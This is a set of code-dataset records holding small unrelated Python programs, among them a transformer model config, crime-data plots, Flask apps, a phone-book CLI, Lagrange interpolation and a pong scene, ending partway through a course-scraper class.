e_cfgs,\n d_model=512, \n d_nhead=8, \n num_decoder_layers=6, \n dim_feedforward=2048, \n dropout=0.1,\n activation=\"relu\", \n normalize_before=False,\n return_intermediate_dec=False):\n super().__init__()\n self.encoder = CrossFormer(**e_cfgs)\n decoder_layer = TransformerDecoderLayer(d_model, d_nhead, dim_feedforward,\n dropout, activation, normalize_before)\n decoder_norm = nn.LayerNorm(d_model)\n self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm,\n return_intermediate=return_intermediate_dec)\n self._reset_parameters()\n self.d_model = d_model\n self.nhead = d_nhead\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, mask, query_embed):\n # flatten NxCxHxW to HWxNxC\n bs, c, h, w = src.shape\n # src = src.flatten(2).permute(2, 0, 1)\n # pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n query_embed = query_embed.unsqueeze(1).repeat(1, bs, 1)\n mask = 
mask.flatten(1)\n memory = self.encoder(src)\n tgt = torch.zeros_like(query_embed)\n hs = self.decoder(tgt, memory, memory_key_padding_mask=None, query_pos=query_embed)\n # return hs.transpose(1, 2), memory.permute(1, 2, 0).view(bs, c, h, w)\n # torch.Size([6, 400, 3, 768])\n return hs.transpose(1, 2)\n\n# model configs\nconfigs = {\n 'retinanet_crossformer_s_fpn_1x_coco':\n # [96,192,384,768]\n dict(img_size = [864,1152], patch_size=[4, 8, 16, 32],in_chans=3, embed_dim=96, depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24], group_size=[7,7,7,7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained = None\n ),\n 'retinanet_crossformer_b_fpn_1x_coco':\n # [96,192,384,768], \n dict(img_size=[864,1152], patch_size=[4, 8, 16, 32], in_chans=3, embed_dim=96, depths=[2, 2, 18, 2], \n num_heads=[3, 6, 12, 24], group_size=[7, 7, 7, 7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0.0, attn_drop_rate=0, drop_path_rate=0.3,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n 'mask_rcnn_crossformer_s_fpn_1x_coco':\n # [96,192,384,768]\n dict(img_size = [864,1152], patch_size=[4, 8, 16, 32],in_chans=3, embed_dim=96, depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24], group_size=[7,7,7,7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n 'mask_rcnn_crossformer_b_fpn_1x_coco':\n # [96,192,384,768\n dict(img_size=[864,1152], patch_size=[4, 8, 16, 32], in_chans=3, embed_dim=96, depths=[2, 2, 18, 2], \n num_heads=[3, 6, 12, 24], group_size=[7, 7, 7, 7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0.0, attn_drop_rate=0, drop_path_rate=0.3,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n }\n\ndef build_transformer(args):\n cfgs = configs[args.backbone]\n cfgs.update({'pretrained': args.pretrained})\n return Transformer(\n e_cfgs = cfgs, \n d_model=args.dec_hidden_dim,\n dropout=args.dropout,\n d_nhead=args.dec_nheads,\n dim_feedforward=args.dim_feedforward,\n num_decoder_layers=args.dec_layers,\n normalize_before=args.pre_norm,\n return_intermediate_dec=True,\n )","sub_path":"models/crossformer.py","file_name":"crossformer.py","file_ext":"py","file_size_in_byte":52724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"607936488","text":"import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as mticker\r\nimport numpy as np\r\n\r\n\r\ndf = pd.read_csv(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code/preprocess/processed_csvs/month_to_crime.csv\")\r\ndf[\"Date\"] = df[\"Month\"].astype(str) + \"/\" + df[\"Year\"].astype(str)\r\ndf = df.sort_values([\"Year\", \"Month\"]).reset_index(drop = True)\r\ndf[\"Order\"] = df.index\r\n\r\nprint(df.head(20))\r\n\r\nfig,ax = plt.subplots()\r\ng = sns.lineplot(x=\"Order\", y=\"Crimes Amount\", data=df)\r\nax.set(xlim=(0, df[\"Order\"].max()+1))\r\n\r\nmyLocator = mticker.MultipleLocator(12)\r\ng.xaxis.set_major_locator(myLocator)\r\n\r\ng.set_xticklabels(df[\"Year\"][0::11])\r\nplt.xticks(rotation=90)\r\n\r\nplt.show()\r\n\r\nfor year in 
np.unique(df[\"Year\"]):\r\n crimes_holder = df.loc[df[\"Year\"] == year][\"Crimes Amount\"]\r\n min_max_holder = (crimes_holder - np.min(crimes_holder)) / (np.max(crimes_holder) - np.min(crimes_holder))\r\n df.loc[df[\"Year\"] == year,\"Norm Crimes Amount\"] = min_max_holder\r\n\r\n\r\nfig,ax = plt.subplots()\r\n\r\nh = sns.lineplot(x=\"Month\", y=\"Norm Crimes Amount\", data=df.loc[df[\"Year\"] != 2019], hue = \"Year\", legend = 'full',\r\n palette=sns.color_palette(\"YlOrBr\", n_colors=len(np.unique(df[\"Year\"]))-1))\r\nplt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\nmyLocator = mticker.MultipleLocator(1)\r\nh.xaxis.set_major_locator(myLocator)\r\nplt.show()\r\n\r\n\r\n\r\n\r\nfig,ax = plt.subplots()\r\ndf_part = df.loc[(df[\"Year\"] != 2019)]\r\ndf_part.loc[:,\"Year\"] = df_part[\"Year\"].astype(str)\r\n\r\nrr = sns.boxplot(x=\"Year\", y=\"Norm Crimes Amount\", data=df_part,\r\n palette=sns.color_palette(\"RdBu\", n_colors=len(np.unique(df[\"Year\"]))-1))\r\n#plt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\n#ax.set_xlim(0, 12)\r\nplt.show()\r\n\r\n\r\nsns.pairplot(df, aspect = 0.8, vars = [\"Year\", \"Month\", 'Crimes Amount', 'Arrest', 'Domestic'], size=1.9, plot_kws={\"s\": 4})\r\nplt.show()\r\n\r\n\r\n'''for year in np.unique(df[\"Year\"]):\r\n sns.regplot(x=\"Month\", y = \"Domestic\", data=df.loc[(df[\"Year\"] == year)],\r\n scatter_kws={\"s\": 80},order=2, ci=None, truncate=True)\r\n\r\nplt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\nplt.show()'''\r\n\r\n","sub_path":"visualisations/month_to_crime.py","file_name":"month_to_crime.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"109470863","text":"import os\nimport datetime\n\nfrom collections import OrderedDict, Counter\n\nfrom TimeCsv.consts import *\n\n#\n# file utils\n#\n# get the newsest file\ndef newest(path=DEFAULT_DATA_DIRECTORY):\n\tfiles = os.listdir(path)\n\tpaths = [os.path.join(path, basename) for basename in files]\n\treturn max(paths, key=os.path.getctime)\n\n#\n# parsing utils\n#\ndef ordered_unique(l):\n\treturn list(OrderedDict.fromkeys(l))\n\ndef counter(data):\n return list(Counter(data).items())\n\n#\n# regex utils\n#\ndef re_escape(x):\n\treturn ''.join(\n\t\t(\n\t\t\t'\\\\'+i\n\t\t\t if\n\t\t\ti in re.sre_parse.SPECIAL_CHARS\n\t\t\t else\n\t\t\ti\n\t\t)\n\t\tfor i in x\n\t)\n\ndef re_exact(x):\n\treturn f\"\\\\b{x}\\\\b\"\n\n#\n# datetime utils\n#\ndef get_ymd_tuple(d):\n\t\"ymd stands for Year, Month, Day\"\n\treturn (d.year, d.month, d.day)\n\ndef get_midnight(d):\n\treturn datetime.datetime(*get_ymd_tuple(d))\n\ndef seconds_to_str(n):\n\tn = int(n)\n\n\ts = ''\n\n\tdays = (n // (60*60*24))\n\tif days:\n\t\ts += f\"{days:3d} days\"\n\telse:\n\t\ts += \" \" * (3+1+4)\n\n\ts += ' '\n\n\thours = (n // (60*60) % (24))\n\tif hours:\n\t\ts += f\"{hours:2d} hours\"\n\telse:\n\t\ts += \" \" * (2+1+5)\n\n\ts += ' '\n\n\tminutes = (n // (60) % (60*24) % 60)\n\tif minutes:\n\t\ts += f\"{minutes:2d} minutes\"\n\telse:\n\t\ts += \" \" * (2+1+7)\n\n\treturn s\n\ndef seconds_to_hours_str(n):\n\th = n / (3600)\n\treturn f\"{h:.2f}\"\n\ndef shorten_selected_time(selected_time):\n\tif len(selected_time) > 33:\n\t\treturn \"Multiple Time Filters\"\n\telse:\n\t\treturn selected_time\n\ndef format_dates(date1, date2):\n\treturn DATE_REPRESENTATION_PATTERN % (\n\t\t*get_ymd_tuple(date1),\n\t\t*get_ymd_tuple(date2),\n\t)\n\n#\n# debug utils\n#\ndef print_items(l, 
ret=False):\n\tif ret:\n\t\treturn '\\n'.join(i.__repr__() for i in l)\n\telse:\n\t\tprint('\\n'.join(i.__repr__() for i in l))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"222736719","text":"# Code Eval - minimum coins\n# https://www.codeeval.com/open_challenges/74/\n\nimport sys\n\ntest_cases = open(sys.argv[1], 'r')\nfor test in test_cases:\n    test = int(test)\n    coins = 0\n    while test > 0:\n        while test >= 5:\n            test -= 5\n            coins += 1\n        while test >= 3:\n            test -= 3\n            coins += 1\n        while test >= 1:\n            coins += 1\n            test -= 1\n    print(coins)\n\ntest_cases.close()","sub_path":"CodeEval/python/moderate/minimum-coins/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"584804698","text":"from flask import Flask, render_template, request, jsonify\nfrom ocr import ocr\n\napp = Flask(__name__,\n            template_folder='templates',\n            static_folder='static',\n            static_url_path='/static')\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\n@app.route('/')\ndef index():\n    \"\"\"\n    Serve our app's homepage.\n    :return: Jinja2-rendered HTML file.\n    \"\"\"\n    return render_template('index.html')\n\n\n@app.route('/process', methods=['POST'])\ndef process_image():\n    \"\"\"\n    Process a file upload to our server.\n    :return: JSON data resulting from our processing.\n    \"\"\"\n    if 'file' not in request.files:\n        return jsonify(success=False,\n                       error_msg='No file in request.',\n                       img_text=\"\")\n\n    file = request.files['file']\n    if file_good(file):\n        img_text = ocr(file.filename)\n\n        return jsonify(success=True,\n                       error_msg=\"\",\n                       img_text=img_text)\n    else:\n        return jsonify(success=False,\n                       error_msg=\"File was not an image file/wrong filetype.\",\n                       img_text=\"\")\n\n\ndef file_good(file):\n    if file.filename == '':\n        return False\n    # check the file's extension, not the whole filename\n    elif '.' not in file.filename or file.filename.rsplit('.', 1)[1].lower() not in ALLOWED_EXTENSIONS:\n        return False\n    else:\n        return True\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466690297","text":"import time\r\n\r\nclass agenda_telefonica:\r\n\r\n\tdef __init__(self):\r\n\t\tself.dicc= {}\r\n\r\n\tdef agrega(self,nombre,numero,email):\r\n\t\tself.dicc[nombre] = (numero,email)\r\n\r\n\tdef borrar(self,nombre):\r\n\t\tdel self.dicc[ nombre]\r\n\r\n\tdef actualizar(self,nombre,valores):\r\n\t\tself.dicc[nombre]= valores\r\n\r\n\tdef imprime(self):\r\n\t\tfor i in self.dicc:\r\n\r\n\t\t\tprint(\"\\n\",i,self.dicc[i])\r\n\r\n\tdef exportar(self):\r\n\t\r\n\t\tfichero=open('/Users/molam/Desktop/Agenda_telefono.txt','w')\r\n\t\tfor j in self.dicc:\r\n\t\t\tlista= str(j) , str(self.dicc[j])\r\n\t\t\tfichero.write(str(lista))\r\n\r\n\t\tfichero.close()\r\n\r\n\t@property\r\n\tdef cantidad(self):\r\n\t\treturn len(self.dicc)\r\n\r\n\r\nmiagenda=agenda_telefonica()\r\n\r\nmiagenda.agrega(\"Amigos de Fran\",677076532,'pollascalientes@hotmail.com')\r\n\r\n#entrada de datos agenda\r\n\r\ndef opcion_agregar():\r\n\tnumero_telefono= '0'\r\n\tnombre=input(\"\\nIntroduce el nombre de el contacto: \")\r\n\t#while numero_telefono == 'a' or numero_telefono != '2' or numero_telefono != '3' or numero_telefono != '4'or numero_telefono != '5' or numero_telefono != '6' or numero_telefono != '7' or numero_telefono != 
'8' or numero_telefono != '9':\r\n\tnumero_telefono=input(\"\\nIntroduce el número de teléfono de el contacto: \")\r\n\tcorreo=input(\"\\nIntroduce el correo electrónico de el contacto: \")\r\n\tmiagenda.agrega(nombre,numero_telefono,correo)\r\n\ttime.sleep(1)\r\n\r\ndef opcion_borrar():\r\n\r\n\tnombre_borrar=input(\"\\nIntroduce el nombre de el contacto: \")\r\n\tmiagenda.borrar(nombre_borrar)\r\n\ttime.sleep(1)\r\n\tprint(\"\\nEl contacto {} ha sido borrado exitosamente\\n\".format(nombre_borrar))\r\n\ttime.sleep(1)\r\n\r\ndef opcion_actualizar():\r\n\r\n\tnombre_modificar=input(\"\\nIntroduce el nombre de el contacto que quieras modificar: \")\r\n\tnumero_telefono_modificar=input(\"\\nIntroduce el nuevo número de teléfono de el contacto a modificar: \")\r\n\tcorreo_modificar=input(\"\\nIntroduce el nuevo correo electrónico de el contacto a modificar: \")\r\n\tmiagenda.actualizar(nombre_modificar,(numero_telefono_modificar,correo_modificar))\r\n\ttime.sleep(1)\r\n\r\ndef opcion_mostrar():\r\n\tprint(\"\\n\")\r\n\tmiagenda.imprime()\r\n\ttime.sleep(1)\r\n\r\ndef opcion_num_contactos():\r\n\r\n\tprint(\"\\nLa cantidad de contactos en la agenda es: \",miagenda.cantidad) \r\n\ttime.sleep(1)\r\n\r\ndef opcion_exportar():\r\n\r\n\tmiagenda.exportar()\r\n\tprint(\"\\nLa agenda ha sido exportada en formato 'txt' en tu escritorio\\n\") \r\n\ttime.sleep(1)\r\n\r\n\r\n\t\r\n#Comienzo programa\r\n\r\na=True\r\nopcion=0\r\nwhile a == True:\r\n\r\n\tprint(\"\\n******************************************AGENDA TELEFÓNICA PYTHON******************************************\\n\")\r\n\t\r\n\r\n\twhile True:\r\n\t\tprint(\"\\n*****************************************************************************************************************\\n\")\r\n\t\tprint(\"¿Que quieres hacer?\\n\")\t\r\n\t\topcion=input(\"\\n1. Agregar contacto\\n2. Borrar contacto\\n3. Modificar contacto\\n4. Mostrar información de contacto\\n5. Indicar el número de contactos presentes en la agenda\\n6. 
Exportar agenda en formato de texto\\n7. Salir\\n\\nElige la opción: \")\r\n\t\t\r\n\t\t\r\n\t\tif opcion == '1':\r\n\t\t\topcion_agregar()\r\n\t\telif opcion == '2':\r\n\t\t\topcion_borrar()\r\n\t\telif opcion == '3':\r\n\t\t\topcion_actualizar()\r\n\t\telif opcion == '4':\r\n\t\t\topcion_mostrar()\r\n\t\telif opcion == '5':\r\n\t\t\topcion_num_contactos()\r\n\t\telif opcion == '6':\r\n\t\t\topcion_exportar()\r\n\t\telif opcion == '7':\r\n\t\t\tprint(\"\\n\")\r\n\t\t\ta=False\r\n\t\t\tbreak\r\n\r\n\r\nprint(\"\\nHasta luego\\n\")\r\n\r\n\r\n","sub_path":"agenda_telefonica.py","file_name":"agenda_telefonica.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507476665","text":"import sympy as sp\nimport matplotlib.pyplot as plt\n\nxy_values = []\n\n#Initialize x and y values (make sure the X values are in order)\nxy_values.append([0, 0])\nxy_values.append([10, 227.04])\nxy_values.append([15, 362.78])\nxy_values.append([20, 517.35])\nxy_values.append([22.5, 602.97])\nxy_values.append([30, 901.67])\n\n#Select the two data points between the selected xVal\ndef get_first2_indexes(xy_values, xVal):\n    indexes = []\n    for i in range(len(xy_values)-1):\n        if xy_values[i][0] < xVal and xy_values[i+1][0] > xVal:\n            indexes.append(i)\n            indexes.append(i+1) \n    return indexes\n\n#Find the other data points when n>1\ndef get_remaining_indexes(xy_values, indexes, xVal, n):\n    for _ in range(n-1):\n        #find the value nearest to xVal\n        leftIndex = indexes[0]-1\n        rightIndex = indexes[len(indexes)-1] + 1\n        #Check if the adjacent index exists in the given xy_values data\n        if (leftIndex > -1):\n            if (rightIndex < len(xy_values)):\n                #Check which one is closer to xVal\n                if (abs(xy_values[leftIndex][0] - xVal) < abs(xy_values[rightIndex][0] - xVal)):\n                    indexes.insert(0, leftIndex)\n                else:\n                    indexes.append(rightIndex)\n            else:\n                indexes.insert(0, leftIndex)\n        elif (rightIndex < len(xy_values)):\n            indexes.append(rightIndex)\n    \n    \n#Find the weighting functions\ndef gather_weighting_functions(polynomial):\n    wFunc = [] #Collection of Ln(x)\n    for i in range(polynomial+1):\n        subFunc = [] #Collection of individual (x - xj)/(xi-xj)\n        for j in range(polynomial+1):\n            #j != i\n            if i != j:\n                #(x - xj)/(xi-xj)\n                #sub = [i, j]\n                #sub[0] = xi\n                #sub[1] = xj\n                sub = []\n                sub.append(i)\n                sub.append(j)\n                subFunc.append(sub)\n        wFunc.append(subFunc)\n    \n    return wFunc\n    \n#Add them Together\ndef get_equation(xy_values, wFunc, indexes, x_symbol):\n    total = 0\n    for i in range(len(wFunc)):\n        weight_function_prod = 1\n        for a in range(len(wFunc[i])):\n            iIndex = wFunc[i][a][0]\n#            print(\"iIndex=\", iIndex)\n            index = indexes[iIndex]\n#            print(\"index=\", index)\n            ti = xy_values[index][0]\n#            print(\"ti=\", ti)\n            jIndex = wFunc[i][a][1]\n#            print(\"jIndex=\", jIndex)\n            index = indexes[jIndex]\n#            print(\"index=\", index)\n            tj = xy_values[index][0]\n#            print(\"tj=\", tj)\n#            print(\"operation= (\", x_symbol,\"-\", tj,\") / (\", ti, \"-\", tj, \")\")\n            sub = (x_symbol - tj)/ (ti - tj)\n#            print(\"sub weight function=\", sub)\n            weight_function_prod *= sub\n        #Multiply by f(i)\n#        print(\"weight_function_prod =\", weight_function_prod)\n#        print(\"xy_values=\", xy_values[indexes[i]][1])\n        total += weight_function_prod * xy_values[indexes[i]][1]\n#        print(\"current total=\", total)\n    return sp.simplify(total)\n\n#Solve with xVal\nx = sp.Symbol('x');\nn = 5 #Order of polynomial (Linear = 1)\nxVal = 16 #Value of x to find\nindexes = get_first2_indexes(xy_values, 
xVal)\nget_remaining_indexes(xy_values, indexes, xVal, n)\nwFunc = gather_weighting_functions(n)\nequation = get_equation(xy_values, wFunc, indexes, x)\nresult = equation.evalf(subs={x : xVal})\nprint(\"result =\", result) \n\n#Graphing\ndef graph_lagrange(xy_values, equation, xVal, result, x_symbol):\n    #split x and y\n    x_values = []\n    y_values = []\n    \n    for i in range(len(xy_values)):\n        x_values.append(xy_values[i][0])\n        y_values.append(xy_values[i][1])\n    \n    #Generate x and y\n    new_x_values = []\n    new_y_values = []\n    for i in range(int(min(x_values) * 100), int(max(x_values) * 100), 1):\n        new_x_values.append(i/100)\n        new_y_values.append(equation.evalf(subs={x_symbol:i/100}))\n    \n    plt.plot(x_values, y_values, 'o', label='data')\n    plt.plot(new_x_values, new_y_values, '-', label='equation')\n    plt.plot([xVal], [result], '+', label=\"interpolated data\")\n    plt.legend()\n    plt.xlabel(\"X\")\n    plt.ylabel(\"Y\")\n    \n    plt.show()\n\ngraph_lagrange(xy_values, equation, xVal, result, x)","sub_path":"final_project/lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"530131673","text":"from app.app_and_db import app, db\nfrom app.pages.models import Trade\nfrom datetime import datetime\nfrom flask import jsonify, render_template, redirect, request, url_for\n\nimport requests\n\nbase_url = \"https://api.twitter.com/1.1/{0}\"\n\n@app.route('/')\ndef index():\n    return render_template('pages/home_page.html')\n\n@app.route('/api/<year>/<from_team>/<to_team>/')\ndef team_details(year, from_team, to_team):\n    trades = Trade.query.filter(Trade.year == year).filter(Trade.from_team == from_team).filter(Trade.to_team == to_team).all()\n    json_trades = []\n    for trade in trades:\n        json_trades.append(trade.serialize())\n    return jsonify(trades=json_trades)\n\n@app.route('/api/<year>/<team>/')\ndef complete_team_details(year, team):\n    from_trades = Trade.query.filter(Trade.year == year).filter(Trade.from_team == team).all()\n    to_trades = Trade.query.filter(Trade.year == year).filter(Trade.to_team == team).all()\n    json_to_trades = []\n    json_from_trades = []\n    for trade in to_trades:\n        json_to_trades.append(trade.serialize())\n    for trade in from_trades:\n        json_from_trades.append(trade.serialize())\n    return jsonify(from_trades=json_from_trades, to_trades=json_to_trades)\n\n@app.route('/api/transaction/<transaction_id>/')\ndef get_transaction_details(transaction_id):\n    trades = Trade.query.filter(Trade.transaction_id == transaction_id).all()\n    json_trades = []\n    for trade in trades:\n        json_trades.append(trade.serialize())\n    return jsonify(trades=json_trades)\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n    db.remove()","sub_path":"app/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"509906500","text":"'''\n13) Distance Between Two Cities\n\nCalculates the distance between two cities and allows the user to specify a unit of distance.\nThis program may require finding coordinates for the cities like latitude and longitude.\n'''\n\nfrom geopy import Nominatim\nfrom geopy.distance import vincenty\n\n\ngeolocator = Nominatim()\ncities = ('London', 'Paris', 'Berlin', 'Rome', 'Madrid', 'Lisbon', 'Athens', 'Budapest', 'Warsaw', 'Bucharest', 'Prague')\n[print('{}) {}'.format(cities.index(city)+1, city)) for city in cities]\n\n\ndef choose_city(cities):\n    while True:\n        city = str(input('Choose city from 
list: '))\n if city in cities:\n return city\n else:\n print('Insert a city from the list')\n\n\ndef choose_unit():\n while True:\n unit = str(input('Choose metric or imperial: '))\n if unit.lower() == 'metric' or unit.lower() == 'imperial':\n return unit\n else:\n print('Please choose between the two')\n\n\nprint('Choose first city')\nfirst = choose_city(cities)\nprint('Choose second city')\nsecond = choose_city(cities)\nunit = choose_unit()\nprint(unit)\n\nfirst_city = geolocator.geocode(first)\nsecond_city = geolocator.geocode(second)\n\nif unit == 'imperial':\n print('Distance between {} and {} is {} miles'.format(first, second, round(vincenty((first_city.latitude, first_city.longitude), (second_city.latitude, second_city.longitude)).miles, 2)))\nelse:\n print('Distance between {} and {} is {} km'.format(first, second, round(vincenty((first_city.latitude, first_city.longitude), (second_city.latitude, second_city.longitude)).kilometers, 2)))\n","sub_path":"___basic/bootcamp/capstone/01numbers/13cities.py","file_name":"13cities.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"449686878","text":"from MorcoWrapper2D.mw2_Scene import *\nfrom MorcoWrapper2D.mw2_Image import *\nfrom MorcoWrapper2D.mw2_Circle import *\nfrom MorcoWrapper2D.mw2_Text import *\nfrom MorcoWrapper2D.mw2_Rect import *\nfrom ProjectPong.GameManager import *\n\n\nclass GameScene (mw2_Scene):\n\tdef __init__(self):\n\t\tmw2_Scene.__init__(self)\n\n\n\tdef Build(self):\n\t# create background\n\t\tbackground = mw2_GameObject(\"background\")\n\t\tself.AddObject(background)\n\n\t\tbg_back = mw2_Image(\"bg_back\", \"../__Resources/Pong/background.png\")\n\t\tbg_back.mSize = mw2_Vector2(800, 600)\n\t\tbg_back.AttachTo(background)\n\t\tself.AddObject(bg_back)\n\n\t\tbg_left = mw2_Rect(\"bg_left\")\n\t\tbg_left.mSize = mw2_Vector2(400, 600)\n\t\tbg_left.mColor = mw2_Vector4(255, 100, 0, 100)\n\t\tbg_left.AttachTo(background)\n\t\tbg_left.LocalPosition( mw2_Vector2(-200, 0) )\n\t\tself.AddObject(bg_left)\n\n\t\tbg_right = mw2_Rect(\"bg_right\")\n\t\tbg_right.mSize = mw2_Vector2(400, 600)\n\t\tbg_right.mColor = mw2_Vector4(80, 100, 255, 80)\n\t\tbg_right.AttachTo(background)\n\t\tbg_right.LocalPosition( mw2_Vector2(200, 0) )\n\t\tself.AddObject(bg_right)\n\n\t\tbg_netting = mw2_Image(\"bg_netting\", \"../__Resources/Pong/tex_netting.png\")\n\t\tbg_netting.mSize = mw2_Vector2(10, 600)\n\t\tbg_netting.AttachTo(background)\n\t\tself.AddObject(bg_netting)\n\n\t# create paddle 1\n\t\tpaddle1 = mw2_GameObject(\"paddle1\")\n\t\tpaddle1.WorldPosition( mw2_Vector2(-350, 0) )\n\t\tself.AddObject(paddle1)\n\n\t\tp1_fill = mw2_Rect(\"p1_fill\")\n\t\tp1_fill.mSize = mw2_Vector2(30, 100)\n\t\tp1_fill.mColor = mw2_Vector4(255, 150, 0, 100)\n\t\tp1_fill.mStyle = mw2_Rect.Style.FILL\n\t\tp1_fill.AttachTo(paddle1)\n\t\tp1_fill.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p1_fill)\n\n\t\tp1_line = mw2_Rect(\"p1_line\")\n\t\tp1_line.mSize = mw2_Vector2(30, 100)\n\t\tp1_line.mColor = mw2_Vector4(255, 200, 0, 255)\n\t\tp1_line.mStyle = mw2_Rect.Style.LINE\n\t\tp1_line.AttachTo(paddle1)\n\t\tp1_line.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p1_line)\n\n\t# create paddle 2\n\t\tpaddle2 = mw2_GameObject(\"paddle2\")\n\t\tpaddle2.WorldPosition( mw2_Vector2(350, 0) )\n\t\tself.AddObject(paddle2)\n\n\t\tp2_fill = mw2_Rect(\"p2_fill\")\n\t\tp2_fill.mSize = mw2_Vector2(30, 100)\n\t\tp2_fill.mColor = mw2_Vector4(0, 120, 255, 
100)\n\t\tp2_fill.mStyle = mw2_Rect.Style.FILL\n\t\tp2_fill.AttachTo(paddle2)\n\t\tp2_fill.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p2_fill)\n\n\t\tp2_line = mw2_Rect(\"p2_line\")\n\t\tp2_line.mSize = mw2_Vector2(30, 100)\n\t\tp2_line.mColor = mw2_Vector4(70, 170, 255, 255)\n\t\tp2_line.mStyle = mw2_Rect.Style.LINE\n\t\tp2_line.AttachTo(paddle2)\n\t\tp2_line.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p2_line)\n\n\t# create ball\n\t\tball = mw2_GameObject(\"ball\")\n\t\tself.AddObject(ball)\n\n\t\tball_fill = mw2_Circle(\"ball_fill\")\n\t\tball_fill.mRadius = 15\n\t\tball_fill.mColor = mw2_Vector4(0, 120, 255, 100)\n\t\tball_fill.mStyle = mw2_Circle.Style.FILL\n\t\tball_fill.AttachTo(ball)\n\t\tself.AddObject(ball_fill)\n\n\t\tball_line = mw2_Circle(\"ball_line\")\n\t\tball_line.mRadius = 15\n\t\tball_line.mColor = mw2_Vector4(70, 170, 255, 255)\n\t\tball_line.mStyle = mw2_Circle.Style.LINE\n\t\tball_line.AttachTo(ball)\n\t\tself.AddObject(ball_line)\n\n\t# create score\n\t\tscoreText1 = mw2_Text(\n\t\t\t\"scoreText1\",\n\t\t\t\"../__Resources/Pong/Ericsson-GA628.ttf\",\n\t\t\t80,\n\t\t\t\"01\",\n\t\t\tmw2_Vector4(210, 184, 137, 255),\n\t\t\tmw2_Text.Align.CENTER\n\t\t)\n\t\tscoreText1.WorldPosition( mw2_Vector2(-150, -260) )\n\t\tself.AddObject(scoreText1)\n\n\t\tscoreText2 = mw2_Text(\n\t\t\t\"scoreText2\",\n\t\t\t\"../__Resources/Pong/Ericsson-GA628.ttf\",\n\t\t\t80,\n\t\t\t\"02\",\n\t\t\tmw2_Vector4(210, 184, 137, 255),\n\t\t\tmw2_Text.Align.CENTER\n\t\t)\n\t\tscoreText2.WorldPosition( mw2_Vector2(150, -260) )\n\t\tself.AddObject(scoreText2)","sub_path":"full_project/2D/6. Cocos2D [Python2]/ProjectPong/GameScene.py","file_name":"GameScene.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121329401","text":"\"\"\"\r\nAuthor: Andrew Powell\r\nLast Modified: 20160716\r\nContact: powellandrew@hotmail.com\r\n\"\"\"\r\nimport sqlite3\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom day_time import *\r\n\r\n\r\nclass Course(object):\r\n \"\"\"Extracts and stores basic course information from trico course search page\r\n\r\n This class, given the URL to a trico course page from the trico searchable\r\n schedule, extracts and stores relevant information about the course.\r\n\r\n Attributes:\r\n regid: Department Code and Course Number/Section Info (e.g. 'CPSC 021 01')\r\n course_title: Title of the course (e.g. 'Introduction to Computer Science')\r\n dept: Department in which the course if offered\r\n instructor: Course instructor\r\n time: List of DayTime objects, each DayTime object containing information\r\n on the day of the week and the time at which the course meets\r\n room: Room in which the course meets\r\n \"\"\"\r\n\r\n def __init__(self,url,page_html = None):\r\n \"\"\"Constructor for the Course class, stores course information\r\n\r\n 